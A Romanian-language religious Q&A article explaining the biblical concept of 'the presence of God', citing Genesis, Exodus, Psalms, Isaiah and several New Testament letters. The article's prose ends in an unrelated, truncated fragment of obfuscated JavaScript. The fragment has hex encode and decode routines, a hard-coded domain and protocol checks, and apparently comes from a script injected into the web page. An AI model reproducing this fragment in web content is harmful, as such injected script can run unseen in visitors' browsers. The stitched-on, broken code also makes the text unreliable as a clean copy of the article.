Ce înseamnă expresia „prezența lui Dumnezeu”?

Întrebare:

Aud de multe ori de expresia „prezența lui Dumnezeu”. Ce ați putea să-mi spuneți despre ea?

60575953

Dumnezeu este Duh și este invizibil, de aceea și mijloacele pe care le folosește pentru a-Și descoperi prezența Sa sunt inadecvate. În pofida faptului că Dumnezeul Bibliei este un Dumnezeu ascuns, El Se face cunoscut oamenilor în creație, în catastrofe și calamități, fulgere și cutremure (1 Împărați 19:11-13). De asemenea, El apare în forma umană (Geneza 18; 32:22-32). Prin urmare, Dumnezeu, care nu poate fi văzut, a ales mijloace prin care să-Și descopere transcendența Sa.

Unul din mijloacele prin care Dumnezeu Își manifestă prezența Sa în Vechiul Testament este “Îngerul Domnului”. Îngerul Domnului a fost trimisul lui Dumnezeu pentru a ajuta și proteja poporul Israel. După ce îngerul Domnului i se arată lui Agar și îi dă promisiuni cu privire la fiul ei, ea spune: “Ea a numit Numele Domnului care-i vorbise: “Tu ești Dumnezeu care mă vede!” Căci a zis ea: “Cu adevărat, am văzut aici spatele Celuice m’a văzut!” (Gen.16:13). În cazul lui Iacov, el îl echivalează pe îngerul Domnului cu Dumnezeu “Și Îngerul lui Dumnezeu mi-a zis în vis: “Iacove!”, “Iată-mă”, am răspuns eu. Eu sînt Dumnezeul din Betel, unde ai uns un stîlp de aducere aminte, unde Mi-ai făcut o juruință. Acum, scoală-te, ieși din țara aceasta, și întoarce-te în țara ta de naștere.” (Gen. 31:11, 13)

Un alt mijloc prin care Dumnezeu Își manifestă prezența Sa în Vechiul Testament este “slava lui Dumnezeu”. Slava lui Dumnezeu este o formă concretă a prezenței Sale divine. Cerurile sunt o formă vizibilă a prezenței lui Dumnezeu.

“Cerurile spun slava lui Dumnezeu, și întinderea lor vestește lucrarea mînilor Lui. O zi istorisește alteia acest lucru, o noapte dă de știre alteia despre el. Și aceasta, fără vorbe, fără cuvinte, al căror sunet să fie auzit: dar răsunetul lor străbate tot pămîntul, și glasul lor merge pînă la marginile lumii. În ceruri El a întins un cort soarelui. Și soarele, ca un mire, care iese din odaia lui de nuntă, se aruncă în drumul lui cu bucuria unui viteaz: răsare la un capăt al cerurilor, și își isprăvește drumul la celalt capăt; nimic nu se ascunde de căldura lui.” (Psalmul 19:1-6)

Slava Lui care i se arată poporului Israel într-un foc mistuitor pe muntele Sinai și care a umplut cortul întâlnirii.

Acolo Mă voi întîlni cu copiii lui Israel, și locul acela va fi sfințit de slava Mea.(Exod 29:43)

Prin slava Sa Dumnezeu a consacrat cortul întâlnirii ca și locul prezenței Numelui Său. În Isaia 6 slava lui Dumnezeu apare ca și expresie normală a prezenței Sale divine.

În anul morții împăratului Ozia, am văzut pe Domnul șezînd pe un scaun de domnie foarte înalt, și poalele mantiei Lui umpleau Templul. Serafimii stăteau deasupra Lui, și fiecare avea șase aripi: cu două își acopereau fața, cu două își acopereau picioarele, și cu două sburau. Strigau unul la altul, și ziceau:,,Sfînt, sfînt, sfînt este Domnul oștirilor! Tot pămîntul este plin de mărirea Lui„! Și se zguduiau ușiorii ușii de glasul care răsuna, și casa s’a umplut de fum.” (Isaia 6:1-4)

În Vechiul Testament cuvântul “prezența” este folosit pentru a reprezenta cuvântul ebraic “față” și când “fața” este unită cu o prepoziție înseamnă “în prezența”. În Geneza 32:30 Iacov a văzut pe Dumnezeu “față în față”. Personalitatea și caracterul unui om sunt vizibile pe fața lui. Isaia 63:9 spune:

“În toate necazurile lor n-au fost fără ajutor, și Îngerul care este înaintea Feței Lui i-a mîntuit; El Însuș i-a răscumpărat, în dragostea și îndurarea Lui, și necurmat i-a sprijinit și i-a purtat în zilele din vechime.”

Expresia “Îngerul care este înaintea Feței Lui” înseamnă “Îngerul care este cu Fața Lui”. Prin urmare, fața lui Dumnezeu este prezența lui Dumnezeu care eliberează și dă odihnă copiilor lui Israel.

Domnul a răspuns: “Voi merge Eu însumi cu tine, și îți voi da odihnă.” (Exod 33:14)

A te ruga într-un loc sfânt înseamnă a “căuta Fața lui Dumnezeu.”

Iată partea de moștenire a celor ce-L cheamă, a celor ce caută Fața Ta, Dumnezeul lui Iacov. (Psalmul 24:6)

Alte forme prin care s-a manifestat prezența lui Dumnezeu în Vechiul Testament sunt: Numele lui Dumnezeu, Duhul lui Dumnezeu, locul prezenței lui Dumnezeu. Prezența lui Dumnezeu în mijlocul poporului îi califică ca și popor a lui Dumnezeu.

În Noul Testament prezența lui Dumnezeu este văzută în Isus Hristos, Cuvântul întrupat al lui Dumnezeu. Astfel, cei ce cred în Isus Hristos și rămân în Cuvântul Lui, Dumnezeu este prezent în mijlocul lor. Domnul Isus a revelat prezența lui Dumnezeu în mijlocul poporului prin viața și cuvântul Său. Revelația Numelui lui Dumnezeu este exprimată în Numele lui Isus – Domnul este salvare. Deci, prezența lui Dumnezeu o vedem în persoana și lucrarea lui Isus. Prezența lui Dumnezeu a fost pe cruce, manifestată în răstignirea lui Hristos.

Și dacă Evanghelia noastră este acoperită, este acoperită pentru cei ce sînt pe calea pierzării, a căror minte necredincioasă a orbit-o dumnezeul veacului acestuia, ca să nu vadă strălucind lumina Evangheliei slavei lui Hristos, care este chipul lui Dumnezeu. Căci Dumnezeu, care a zis: “Să lumineze lumina din întunerec”, ne-a luminat inimile, pentruca să facem să strălucească lumina cunoștinței slavei lui Dumnezeu pe fața lui Isus Hristos. (2 Corinteni 4:3-4, 6)

În Noul Testament Biserica Mântuitorului este Templul lui Dumnezeu. Creștinismul în esență este prezența lui Dumnezeu și a părtășiei cu Dumnezeu. Trupul lui Hristos e făcut din pietre vii ale Templului lui Dumnezeu.

Și voi, ca niște pietre vii, sînteți zidiți ca să fiți o casă duhovnicească, o preoție sfîntă, și să aduceți jertfe duhovnicești, plăcute lui Dumnezeu, prin Isus Hristos. (1 Petru 2:5)

Creștinul este templul Duhului Sfânt, templul lui Dumnezeu.

Nu știți că trupul vostru este Templul Duhului Sfînt, care locuiește în voi, și pe care L-ați primit dela Dumnezeu? Și că voi nu sînteți ai voștri? Căci ați fost cumpărați cu un preț. Proslăviți dar pe Dumnezeu în trupul și în duhul vostru, cari sînt ale lui Dumnezeu. (1 Corinteni 6:19-20)

În Noul Legământ Dumnezeu este prezent în inima credinciosului, Dumnezeu domnește acolo, pentru că acolo este împărăția Lui, acolo este slăvit și adorat.

Căci Dumnezeu a vrut ca toată plinătatea să locuiască în El, și să împace totul cu Sine prin El, atît ce este pe pămînt cît și ce este în ceruri, făcînd pace, prin sîngele crucii Lui. (Coloseni 1:19)

Drept răspuns, Isus i-a zis:,,Dacă Mă iubește cineva, va păzi cuvîntul Meu, și Tatăl Meu îl va iubi. Noi vom veni la el, și vom locui împreună cu el. (Ioan 14:23)

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "moldovacrestina.md"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e